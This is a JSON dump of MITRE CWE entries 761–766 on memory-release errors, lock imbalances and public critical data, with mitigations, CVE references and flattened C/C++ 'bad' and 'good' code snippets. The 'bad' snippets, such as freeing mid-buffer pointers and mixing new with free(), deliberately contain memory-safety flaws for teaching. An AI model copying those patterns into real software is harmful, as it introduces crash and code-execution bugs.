strtok( input, sep);while( NULL != tok ){}free( input )","xhtml:br":["","","","","","","","","","","","",""],"xhtml:i":["//hardcode input length for simplicity","/* The following loop will parse and process each token in the input string */"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( !isMalformed( command ) ){}tok = strtok( NULL, sep));","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"command = (char*) malloc( (strlen(tok) + 1) * sizeof(char) );strcpy( command, tok );add_to_command_queue( command );","xhtml:br":["","","",""],"xhtml:i":"/* copy and enqueue good data */"}},"xhtml:br":""}}}}],"Body_Text":["While the above code attempts to free memory associated with bad commands, since the memory was all allocated in one chunk, it must all be freed together.","One way to fix this problem would be to copy the commands into a new memory location before placing them in the queue. Then, after all commands have been processed, the memory can safely be freed."]}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-11930","Description":"function \\"internally calls \'calloc\' and returns a pointer at an index... inside the allocated buffer. This led to freeing invalid memory.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11930"}},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP12","Entry_Name":"Faulty Memory Release"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-657"}},{"attr":{"@_External_Reference_ID":"REF-480"}}]},"Notes":{"Note":{"#text":"Currently, CWE-763 is the parent, however it may be desirable to have an intermediate parent which is not function-specific, similar to how CWE-762 is an intermediate parent between CWE-763 and CWE-590.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-05-08"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Observed_Examples"}]}},"762":{"attr":{"@_ID":"762","@_Name":"Mismatched Memory Management Routines","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application attempts to return a memory resource to the system, but it calls a release function that is not compatible with the function that was originally used to allocate that resource.","Extended_Description":{"xhtml:p":["This weakness can be generally described as mismatching memory management routines, such as:","When the memory management functions are mismatched, the consequences may be as severe as code execution, memory corruption, or program crash. Consequences and ease of exploit will vary depending on the implementation of the routines and the object being managed."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["The memory was allocated on the stack (automatically), but it was deallocated using the memory management routine free() (CWE-590), which is intended for explicitly allocated heap memory.","The memory was allocated explicitly using one set of memory management functions, and deallocated using a different set. For example, memory might be allocated with malloc() in C++ instead of the new operator, and then deallocated with the delete operator."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"763","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability","Confidentiality"],"Impact":["Modify Memory","DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Only call matching memory management functions. Do not mix and match routines. For example, when you allocate a buffer with malloc(), dispose of the original pointer with free()."},{"attr":{"@_Mitigation_ID":"MIT-41"},"Phase":"Implementation","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Choose a language or tool that provides automatic memory management, or makes manual memory management less error-prone.","For example, glibc in Linux provides protection against free of invalid pointers.","When using Xcode to target OS X or iOS, enable automatic reference counting (ARC) [REF-391].","To help correctly and consistently manage memory when programming in C++, consider using a smart pointer class such as std::auto_ptr (defined by ISO/IEC ISO/IEC 14882:2003), std::shared_ptr and std::unique_ptr (specified by an upcoming revision of the C++ standard, informally referred to as C++ 1x), or equivalent solutions such as Boost."]}},{"attr":{"@_Mitigation_ID":"MIT-4.6"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, glibc in Linux provides protection against free of invalid pointers."]}},{"Phase":"Architecture and Design","Description":"Use a language that provides abstractions for memory allocation and deallocation."},{"Phase":"Testing","Description":"Use a tool that dynamically detects memory management problems, such as valgrind."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-80"},"Intro_Text":"This example allocates a BarObj object using the new operator in C++, however, the programmer then deallocates the object using free(), which may lead to unexpected behavior.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"void foo(){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BarObj *ptr = new BarObj()...free(ptr);","xhtml:br":["","","","",""],"xhtml:i":"/* do some work with ptr here */"}}}},{"attr":{"@_Nature":"good","@_Language":"C++"},"xhtml:div":{"#text":"void foo(){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BarObj *ptr = new BarObj()...delete ptr;","xhtml:br":["","","","",""],"xhtml:i":"/* do some work with ptr here */"}}}}],"Body_Text":"Instead, the programmer should have either created the object with one of the malloc family functions, or else deleted the object with the delete operator."},{"attr":{"@_Demonstrative_Example_ID":"DX-85"},"Intro_Text":"In this example, the program does not use matching functions such as malloc/free, new/delete, and new[]/delete[] to allocate/deallocate the resource.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"class A {};void A::foo(){}","xhtml:div":[{"#text":"void foo();","attr":{"@_style":"margin-left:10px;"}},{"#text":"int *ptr;ptr = (int*)malloc(sizeof(int));delete ptr;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":""}}},{"attr":{"@_Demonstrative_Example_ID":"DX-86"},"Intro_Text":"In this example, the program calls the delete[] function on non-heap memory.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"class A{};void A::foo(bool heap) {}","xhtml:div":[{"#text":"void foo(bool);","attr":{"@_style":"margin-left:10px;"}},{"#text":"int localArray[2] = {};int *p = localArray;if (heap){}delete[] p;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"11,22","attr":{"@_style":"margin-left:10px;"}},{"#text":"p = new int[2];","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["","",""]}],"xhtml:br":""}}}]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"WIN30-C","Entry_Name":"Properly pair allocation and deallocation functions","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP12","Entry_Name":"Faulty Memory Release"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-657"}},{"attr":{"@_External_Reference_ID":"REF-480"}},{"attr":{"@_External_Reference_ID":"REF-391"}}]},"Notes":{"Note":{"attr":{"@_Type":"Applicable Platform"},"xhtml:p":"This weakness is possible in any programming language that allows manual management of memory."}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-05-08"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Contribution":{"attr":{"@_Type":"Feedback"},"Contribution_Name":"Martin Sebor","Contribution_Organization":"Cisco Systems, Inc.","Contribution_Date":"2010-04-30","Contribution_Comment":"Provided improvement to existing Mitigation"}}},"763":{"attr":{"@_ID":"763","@_Name":"Release of Invalid Pointer or Reference","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application attempts to return a memory resource to the system, but calls the wrong release function or calls the appropriate release function incorrectly.","Extended_Description":{"xhtml:p":"This weakness can take several forms, such as:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["The memory was allocated, explicitly or implicitly, via one memory management method and deallocated using a different, non-compatible function (CWE-762).","The function calls or memory management routines chosen are appropriate, however they are used incorrectly, such as in CWE-761."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability","Confidentiality"],"Impact":["Modify Memory","DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands"],"Note":"This weakness may result in the corruption of memory, and perhaps instructions, possibly leading to a crash. If the corrupted memory can be effectively controlled, it may be possible to execute arbitrary code."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Only call matching memory management functions. Do not mix and match routines. For example, when you allocate a buffer with malloc(), dispose of the original pointer with free()."},{"Phase":"Implementation","Description":"When programming in C++, consider using smart pointers provided by the boost library to help correctly and consistently manage memory."},{"attr":{"@_Mitigation_ID":"MIT-4.6"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, glibc in Linux provides protection against free of invalid pointers."]}},{"Phase":"Architecture and Design","Description":"Use a language that provides abstractions for memory allocation and deallocation."},{"Phase":"Testing","Description":"Use a tool that dynamically detects memory management problems, such as valgrind."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-78"},"Intro_Text":"This code attempts to tokenize a string and place it into an array using the strsep function, which inserts a \\\\0 byte in place of whitespace or a tab character. After finishing the loop, each string in the AP array points to a location within the input string.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char **ap, *argv[10], *inputstring;for (ap = argv; (*ap = strsep(&inputstring, \\" \\\\t\\")) != NULL;)/.../free(ap[4]);","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (**ap != \'\\\\0\')","xhtml:div":{"#text":"if (++ap >= &argv[10])","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"break;","attr":{"@_style":"margin-left:10px;"}}}}}}},"Body_Text":"Since strsep is not allocating any new memory, freeing an element in the middle of the array is equivalent to free a pointer in the middle of inputstring."},{"attr":{"@_Demonstrative_Example_ID":"DX-80"},"Intro_Text":"This example allocates a BarObj object using the new operator in C++, however, the programmer then deallocates the object using free(), which may lead to unexpected behavior.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"void foo(){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BarObj *ptr = new BarObj()...free(ptr);","xhtml:br":["","","","",""],"xhtml:i":"/* do some work with ptr here */"}}}},{"attr":{"@_Nature":"good","@_Language":"C++"},"xhtml:div":{"#text":"void foo(){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BarObj *ptr = new BarObj()...delete ptr;","xhtml:br":["","","","",""],"xhtml:i":"/* do some work with ptr here */"}}}}],"Body_Text":"Instead, the programmer should have either created the object with one of the malloc family functions, or else deleted the object with the delete operator."},{"attr":{"@_Demonstrative_Example_ID":"DX-77"},"Intro_Text":"In this example, the programmer dynamically allocates a buffer to hold a string and then searches for a specific character. After completing the search, the programmer attempts to release the allocated memory and return SUCCESS or FAILURE to the caller. Note: for simplification, this example uses a hard-coded \\"Search Me!\\" string and a constant string length of 20.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define SUCCESS (1)#define FAILURE (0)int contains_char(char c){}","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char *str;str = (char*)malloc(20*sizeof(char));strcpy(str, \\"Search Me!\\");while( *str != NULL){}free(str);return FAILURE;","xhtml:br":["","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( *str == c ){}str = str + 1;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"free(str);return SUCCESS;","xhtml:br":["","",""],"xhtml:i":"/* matched char, free string and return success */"}},"xhtml:br":["","",""],"xhtml:i":"/* didn\'t match yet, increment pointer and try next char */"}},"xhtml:i":"/* we did not match the char in the string, free mem and return failure */"}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"#define SUCCESS (1)#define FAILURE (0)int cointains_char(char c){}","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char *str;int i = 0;str = (char*)malloc(20*sizeof(char));strcpy(str, \\"Search Me!\\");while( i < strlen(str) ){}free(str);return FAILURE;","xhtml:br":["","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( str[i] == c ){}i = i + 1;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"free(str);return SUCCESS;","xhtml:br":["","",""],"xhtml:i":"/* matched char, free string and return success */"}},"xhtml:br":["","",""],"xhtml:i":"/* didn\'t match yet, increment pointer and try next char */"}},"xhtml:i":"/* we did not match the char in the string, free mem and return failure */"}}}}],"Body_Text":["However, if the character is not at the beginning of the string, or if it is not in the string at all, then the pointer will not be at the start of the buffer when the programmer frees it.","Instead of freeing the pointer in the middle of the buffer, the programmer can use an indexing pointer to step through the memory or abstract the memory calculations by using array indexing."]},{"attr":{"@_Demonstrative_Example_ID":"DX-79"},"Intro_Text":"Consider the following code in the context of a parsing application to extract commands out of user data. The intent is to parse each command and add it to a queue of commands to be executed, discarding each malformed entry.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* input = (char*) malloc(40*sizeof(char));char *tok;char* sep = \\" \\\\t\\";get_user_input( input );tok = strtok( input, sep);while( NULL != tok ){}","xhtml:br":["","","","","","","","","","",""],"xhtml:i":["//hardcode input length for simplicity","/* The following loop will parse and process each token in the input string */"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( isMalformed( tok ) ){}else{}tok = strtok( NULL, sep));","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"free( tok );","xhtml:br":["",""],"xhtml:i":"/* ignore and discard bad data */"}},{"#text":"add_to_command_queue( tok );","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["",""]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"char* input = (char*) malloc(40*sizeof(char));char *tok, *command;char* sep = \\" \\\\t\\";get_user_input( input );tok = strtok( input, sep);while( NULL != tok ){}free( input )","xhtml:br":["","","","","","","","","","","","",""],"xhtml:i":["//hardcode input length for simplicity","/* The following loop will parse and process each token in the input string */"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( !isMalformed( command ) ){}tok = strtok( NULL, sep));","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"command = (char*) malloc( (strlen(tok) + 1) * sizeof(char) );strcpy( command, tok );add_to_command_queue( command );","xhtml:br":["","","",""],"xhtml:i":"/* copy and enqueue good data */"}},"xhtml:br":""}}}}],"Body_Text":["While the above code attempts to free memory associated with bad commands, since the memory was all allocated in one chunk, it must all be freed together.","One way to fix this problem would be to copy the commands into a new memory location before placing them in the queue. Then, after all commands have been processed, the memory can safely be freed."]}]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP12","Entry_Name":"Faulty Memory Release"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-657"}},{"attr":{"@_External_Reference_ID":"REF-480"}}]},"Notes":{"Note":{"#text":"The view-1000 subtree that is associated with this weakness needs additional work. Several entries will likely be created in this branch. Currently the focus is on free() of memory, but delete and other related release routines may require the creation of intermediate entries that are not specific to a particular function. In addition, the role of other types of invalid pointers, such as an expired pointer, i.e. CWE-415 Double Free and release of uninitialized pointers, related to CWE-457.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-05-08"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}]}},"764":{"attr":{"@_ID":"764","@_Name":"Multiple Locks of a Critical Resource","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software locks a critical resource more times than intended, leading to an unexpected state in the system.","Extended_Description":"When software is operating in a concurrent environment and repeatedly locks a critical resource, the consequences will vary based on the type of lock, the lock\'s implementation, and the resource being protected. In some situations such as with semaphores, the resources are pooled and extra locking calls will reduce the size of the total available pool, possibly leading to degraded performance or a denial of service. If this can be triggered by an attacker, it will be similar to an unrestricted lock (CWE-412). In the context of a binary lock, it is likely that any duplicate locking attempts will never succeed since the lock is already held and progress may not be possible.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"667","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"675","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Availability","Integrity"],"Impact":["DoS: Resource Consumption (CPU)","DoS: Crash, Exit, or Restart","Unexpected State"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"When locking and unlocking a resource, try to be sure that all control paths through the code in which the resource is locked one or more times correspond to exactly as many unlocks. If the software acquires a lock and then determines it is not able to perform its intended behavior, be sure to release the lock(s) before waiting for conditions to improve. Reacquire the lock(s) before trying again."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP21","Entry_Name":"Multiple locks/unlocks"}},"Notes":{"Note":{"#text":"An alternate way to think about this weakness is as an imbalance between the number of locks / unlocks in the control flow. Over the course of execution, if each lock call is not followed by a subsequent call to unlock in a reasonable amount of time, then system performance may be degraded or at least operating at less than peak levels if there is competition for the locks. This entry may need to be modified to reflect these concepts in the future.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"765":{"attr":{"@_ID":"765","@_Name":"Multiple Unlocks of a Critical Resource","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software unlocks a critical resource more times than intended, leading to an unexpected state in the system.","Extended_Description":"When software is operating in a concurrent environment and repeatedly unlocks a critical resource, the consequences will vary based on the type of lock, the lock\'s implementation, and the resource being protected. In some situations such as with semaphores, the resources are pooled and extra calls to unlock will increase the count for the number of available resources, likely resulting in a crash or unpredictable behavior when the system nears capacity.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"667","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"675","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Availability","Integrity"],"Impact":["DoS: Crash, Exit, or Restart","Modify Memory","Unexpected State"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"When locking and unlocking a resource, try to be sure that all control paths through the code in which the resource is locked one or more times correspond to exactly as many unlocks. If the software acquires a lock and then determines it is not able to perform its intended behavior, be sure to release the lock(s) before waiting for conditions to improve. Reacquire the lock(s) before trying again."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2009-0935","Description":"Attacker provides invalid address to a memory-reading function, causing a mutex to be unlocked twice","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0935"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP21","Entry_Name":"Multiple locks/unlocks"}},"Notes":{"Note":{"#text":"An alternate way to think about this weakness is as an imbalance between the number of locks / unlocks in the control flow. Over the course of execution, if each lock call is not followed by a subsequent call to unlock in a reasonable amount of time, then system performance may be degraded or at least operating at less than peak levels if there is competition for the locks. This entry may need to be modified to reflect these concepts in the future.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"766":{"attr":{"@_ID":"766","@_Name":"Critical Data Element Declared Public","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software declares a critical variable, field, or member to be public when intended security policy requires it to be private.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1061","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Indirect"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality"],"Impact":["Read Application Data","Modify Application Data"],"Note":"Making a critical variable public allows anyone with access to the object in which the variable is contained to alter or read the value."},{"Scope":"Other","Impact":"Reduce Maintainability"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Data should be private, static, and final whenever possible. This will assure that your code is protected by instantiating early, preventing access, and preventing tampering."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following example declares a critical variable public, making it accessible to anyone with access to the object in which it is contained.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":"public: char* password;"},{"attr":{"@_Nature":"good","@_Language":"C++"},"xhtml:div":"private: char* password;"}],"Body_Text":["Instead, the critical data should be declared private.","Even though this example declares the password to be private, there are other possible issues with this implementation, such as the possibility of recovering the password from process memory (CWE-257)."]},{"Intro_Text":"The following example shows a basic user account class that includes member variables for the username and password as 